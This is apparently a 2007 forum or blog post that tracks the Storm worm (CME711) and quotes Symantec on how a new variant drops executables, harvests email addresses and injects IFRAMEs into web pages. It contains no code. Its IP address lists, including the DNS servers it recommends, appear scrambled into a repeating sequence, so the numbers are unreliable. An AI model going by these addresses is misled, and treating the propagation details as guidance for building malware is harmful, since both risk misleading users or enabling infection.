This first set of quotes is from the other day, and many other sites have been carrying it in one form or another. But Symantec, below that, is the first site I've seen to show these details and they ain't good.
Once again, CME711's domain resolvers are all pointing to 0.0.0.0 - which suggests another change is upon us.Update from Randy V
What will it be this time? Baseball? My home team has just swept the Diamond Backs, and made it to the World Series. Congratulations to the Colorado Rockies! The last 22 games have been outstanding!
They are back in full force. A nearly complete turn over of the active list from yesterday:Update 2 (from Nicholas):
188.8.131.52 184.108.40.206 220.127.116.11 18.104.22.168 22.214.171.124 126.96.36.199 188.8.131.52 184.108.40.206 220.127.116.11 18.104.22.168 22.214.171.124 126.96.36.199 188.8.131.52 184.108.40.206 220.127.116.11 18.104.22.168 22.214.171.124
and the currently active list:
126.96.36.199 188.8.131.52 184.108.40.206 220.127.116.11 18.104.22.168 22.214.171.124 126.96.36.199 188.8.131.52 184.108.40.206 220.127.116.11 18.104.22.168 22.214.171.124 126.96.36.199 188.8.131.52 184.108.40.206 220.127.116.11 18.104.22.168 22.214.171.124 126.96.36.199 188.8.131.52 184.108.40.206 220.127.116.11 18.104.22.168 22.214.171.124
Only 126.96.36.199, 188.8.131.52 and 184.108.40.206 are in common. 220.127.116.11 is probably only a proxy.
Baseball does sound like a ripe target. There has not been a page change yet.
OpenDNS is null routing all CME711 domains. You can protect yourself from some of the effects of this trojan by changing your domain servers to 18.104.22.168 and 22.214.171.124. For more information visit the OpenDNS website.
This is gonna get ugly....fast.
The encryption is trivial and isn't the only new thing found in this variant. It seems to have some new techniques for propagation. Firstly, it is able to scan the file system and drop an executable into any folder with at least one .exe file. Secondly, the worm is able to harvest email addresses from the file system and send spam to those addresses. Lastly, it is able to search for .htm, .html, and .php files and inject malicious IFRAME code into them. We believe that this part of the worm is still under development due to the buggy nature of the code we are seeing. The IFRAME tag isn't hard coded. We suspect this information must be coming from the P2P C&C. [span style=\'color:blue\']Symantec Security Response Blog[/span]
We were able to use our favorite search engine to look for one of the known tags within the IFRAME and we saw some sites that were already infected. These sites each lead us to a fast-flux domain of the Storm worm. Considering how much this worm has evolved and where it is at currently, I think its time for us to escalate this worm to hurricane category.